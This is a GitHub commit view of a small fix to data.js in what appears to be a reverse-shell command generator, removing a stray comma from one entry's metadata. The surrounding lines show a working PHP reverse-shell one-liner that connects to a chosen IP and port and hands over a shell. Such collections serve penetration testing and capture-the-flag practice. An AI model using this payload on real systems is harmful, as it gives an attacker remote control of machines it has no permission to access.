Merge pull request #178 from 0dayCTF/0dayCTF-patch-15

Update data.js
This commit is contained in:
Ryan Montgomery 2024-10-31 18:37:10 -04:00 committed by GitHub
commit 28774753ce
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

View File

@ -174,7 +174,7 @@ const reverseShellCommands = withCommandType(
{ {
"name": "PHP exec", "name": "PHP exec",
"command": "php -r '$sock=fsockopen(\"{ip}\",{port});exec(\"{shell} <&3 >&3 2>&3\");'", "command": "php -r '$sock=fsockopen(\"{ip}\",{port});exec(\"{shell} <&3 >&3 2>&3\");'",
"meta": ["linux", , "mac"] "meta": ["linux", "mac"]
}, },
{ {
"name": "PHP shell_exec", "name": "PHP shell_exec",